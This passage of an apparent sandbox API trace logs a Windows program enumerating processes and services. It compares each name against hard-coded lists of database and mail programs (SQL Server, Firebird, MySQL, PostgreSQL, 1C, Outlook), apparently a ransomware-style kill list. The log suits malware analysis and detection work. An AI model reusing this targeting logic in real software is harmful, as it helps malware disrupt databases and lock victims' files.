th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.640] lstrlenW (lpString="spoolsv.exe") returned 11 [0271.640] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0271.641] lstrlenW (lpString="reader_sl.exe") returned 13 [0271.641] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0271.641] lstrlenW (lpString="dllhost.exe") returned 11 [0271.641] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0271.641] lstrlenW (lpString="taskhost.exe") returned 12 [0271.642] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.642] lstrlenW (lpString="svchost.exe") returned 11 [0271.642] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0271.642] CloseHandle (hObject=0x398) returned 1 [0271.642] Sleep (dwMilliseconds=0x1f4) [0272.199] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc6c8 [0272.376] EnumServicesStatusExW (in: hSCManager=0x42dc6c8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0272.376] GetLastError () returned 0xea [0272.376] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0272.376] EnumServicesStatusExW (in: hSCManager=0x42dc6c8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0272.377] CloseServiceHandle (hSCObject=0x42dc6c8) returned 1 [0272.377] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0272.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.377] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.377] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0272.377] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0272.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0272.377] lstrlenW (lpString="AudioSrv") returned 8 [0272.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0272.377] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0272.377] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0272.377] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0272.377] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0272.377] lstrlenW (lpString="BFE") returned 3 [0272.377] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0272.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0272.378] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0272.378] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0272.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0272.378] lstrlenW (lpString="CryptSvc") returned 8 [0272.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0272.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0272.378] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0272.378] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0272.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0272.378] lstrlenW (lpString="CscService") returned 10 [0272.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0272.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0272.378] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0272.378] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0272.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0272.378] lstrlenW (lpString="DcomLaunch") returned 10 [0272.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.378] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0272.378] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0272.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0272.378] lstrlenW (lpString="Dhcp") returned 4 [0272.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0272.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0272.378] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0272.378] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0272.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0272.378] lstrlenW (lpString="Dnscache") returned 8 [0272.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0272.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0272.378] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0272.378] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0272.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0272.378] lstrlenW (lpString="DPS") returned 3 [0272.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0272.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0272.379] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0272.379] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0272.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0272.379] lstrlenW (lpString="eventlog") returned 8 [0272.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0272.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0272.379] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0272.379] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0272.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0272.379] lstrlenW (lpString="EventSystem") returned 11 [0272.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0272.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0272.379] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0272.379] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0272.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0272.379] lstrlenW (lpString="gpsvc") returned 5 [0272.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0272.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0272.379] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0272.379] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0272.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0272.379] lstrlenW (lpString="LanmanWorkstation") returned 17 [0272.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.379] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0272.379] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0272.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0272.380] lstrlenW (lpString="lmhosts") returned 7 [0272.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0272.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0272.380] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0272.380] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0272.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0272.380] lstrlenW (lpString="MMCSS") returned 5 [0272.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0272.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0272.380] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0272.380] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0272.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0272.380] lstrlenW (lpString="MpsSvc") returned 6 [0272.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0272.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0272.380] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0272.380] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0272.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0272.380] lstrlenW (lpString="NlaSvc") returned 6 [0272.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0272.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0272.380] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0272.380] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0272.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0272.380] lstrlenW (lpString="nsi") returned 3 [0272.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0272.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0272.380] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0272.380] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0272.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0272.380] lstrlenW (lpString="PcaSvc") returned 6 [0272.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0272.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0272.380] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0272.381] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0272.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0272.381] lstrlenW (lpString="PlugPlay") returned 8 [0272.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0272.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0272.381] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0272.381] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0272.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0272.381] lstrlenW (lpString="Power") returned 5 [0272.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0272.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0272.381] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0272.381] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0272.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0272.381] lstrlenW (lpString="ProfSvc") returned 7 [0272.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0272.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0272.381] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0272.381] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0272.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0272.381] lstrlenW (lpString="RpcEptMapper") returned 12 [0272.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.381] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0272.381] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0272.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0272.381] lstrlenW (lpString="RpcSs") returned 5 [0272.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0272.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0272.381] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0272.381] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0272.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0272.381] lstrlenW (lpString="SamSs") returned 5 [0272.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0272.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0272.382] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0272.382] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0272.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0272.382] lstrlenW (lpString="Schedule") returned 8 [0272.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0272.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0272.382] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0272.382] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0272.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0272.382] lstrlenW (lpString="SENS") returned 4 [0272.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0272.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0272.382] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0272.382] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0272.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0272.382] lstrlenW (lpString="ShellHWDetection") returned 16 [0272.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.382] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0272.382] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0272.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0272.382] lstrlenW (lpString="Spooler") returned 7 [0272.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0272.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0272.382] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0272.382] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0272.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0272.382] lstrlenW (lpString="Themes") returned 6 [0272.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0272.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0272.382] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0272.382] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0272.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0272.382] lstrlenW (lpString="UxSms") returned 5 [0272.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0272.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0272.383] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0272.383] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0272.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0272.383] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0272.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a8 [0272.385] Process32FirstW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.385] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.385] lstrlenW (lpString="System") returned 6 [0272.385] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0272.385] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0272.385] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0272.385] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0272.385] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0272.385] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0272.385] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0272.385] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.386] lstrlenW (lpString="smss.exe") returned 8 [0272.386] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0272.386] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.386] lstrlenW (lpString="csrss.exe") returned 9 [0272.386] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.386] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.386] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.387] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.387] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.387] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.387] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.387] lstrlenW (lpString="wininit.exe") returned 11 [0272.387] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0272.387] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0272.387] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0272.387] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0272.387] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0272.387] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0272.387] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0272.387] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.388] lstrlenW (lpString="csrss.exe") returned 9 [0272.388] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.388] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.388] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.388] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.388] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.388] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.388] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.388] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.388] lstrlenW (lpString="winlogon.exe") returned 12 [0272.388] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0272.388] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0272.388] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0272.388] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0272.388] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0272.388] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0272.388] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0272.388] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.389] lstrlenW (lpString="services.exe") returned 12 [0272.389] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0272.389] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0272.389] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0272.389] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0272.389] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0272.389] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0272.389] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0272.389] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.389] lstrlenW (lpString="lsass.exe") returned 9 [0272.389] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0272.389] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0272.389] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0272.389] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0272.389] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0272.390] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0272.390] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0272.390] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0272.390] lstrlenW (lpString="lsm.exe") returned 7 [0272.390] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0272.390] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0272.390] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0272.390] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0272.390] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0272.390] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0272.390] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0272.390] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, 